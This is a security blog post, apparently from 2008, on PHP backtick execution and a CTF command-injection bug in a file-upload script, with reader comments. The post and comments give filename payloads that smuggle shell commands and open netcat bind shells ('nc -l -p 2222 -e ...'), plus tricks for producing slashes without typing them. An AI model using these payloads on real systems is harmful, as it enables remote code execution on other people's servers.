Fun with Backticks

While chatting with some guys at the OWASP AppSecEU 08 I noticed that backticks are oftenly overlooked in PHP. I came across backticks myself just some time ago while researching vulnerable functions on php.net for my PHP Scanner and found this entry. So you can use something like

$foo = `command here`;

to execute OS commands just like using system, shell_exec and what have you. This was absolutely new to me, although I’ve been working with PHP for quite a while and can be easily overlooked when reviewing code or filtering on mentioned functions (which is an bad idea anyway ;))

While talking about backticks I remembered a quite interesting security hole given on the UCSB CTF 07 (in the service “copyright” for those of you who participated or want to have a shot at the image). The service allowed to upload files and the relevant PHP code looked like the following:

$target_path = "../../uploads/". basename( $_FILES['file']['name']);
$command = "cp ".escapeshellarg($_FILES['file']['tmp_name'])." ".$target_path;
exec($command, $out, $ret);

If you take a closer look at the code you will see that you can execute code by naming the file you are going to upload to something like

foo;ping localhost

since “;” are allowed in filenames and will add a new command after the cp command gets executed. The problem was that we needed slashes in our filename to execute “foo;nc -l -p 2222 -e /bin/bash” or copy some interesting files to the webdir with “../../../../var/www/Site”. Obviously you cant rename your file containing a slash or craft such a request because its still handled as a file by PHP and slashes would be dealed as directorys. Now my mate Freddy had the idea to use backticks again, because they work at the command line just like in PHP to execute commands and return their output:

foo;nc -l -p 2222 -e `nc -l -p 3333`

This code will wait for something passed on port 3333 and then execute the rest of it. So we connect to port 3333, enter /bin/bash and will finally get a remote shell.
As we figured out afterwards this was a fairly stupid workaround for just using nc -l -p 2222 -e `which bash`, but was plain fun anyway during the contest.

Interesting to note is also that backticks on commandline work in double quotes, but not in single quotes.

About these ads

5 Responses to Fun with Backticks

  1. Anonymous says:

    Interesting bug. There are, of course, lot’s of tricks to encode characters in a shell command. Here’s one using only builtin shell commands:

    file; S=$(echo -e “\x2F”); eval “nc -l -p 1337 -e ${S}bin${S}bash”;

    $(command) is equivalent to `command`. You could also use sed, tr, perl, etc to encode/decode strings if those programs are available.

  2. Reiners says:

    Hi !
    unfortunetly this wont work because you cant fake a “\” in file names ;)
    anyway, thanks for sharing your idea !

  3. Reiners says:

    another idea to get a slash on command line would be:
    `pwd|head -c1`
    this returns the current directorys first character, which should always result in a “/”.

  4. Freddy says:

    even better: ${PWD:0:1} shorter & doesn’t actually run a command

  5. bhavana says:

    it can be escaped by using / simble

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 86 other followers

%d bloggers like this: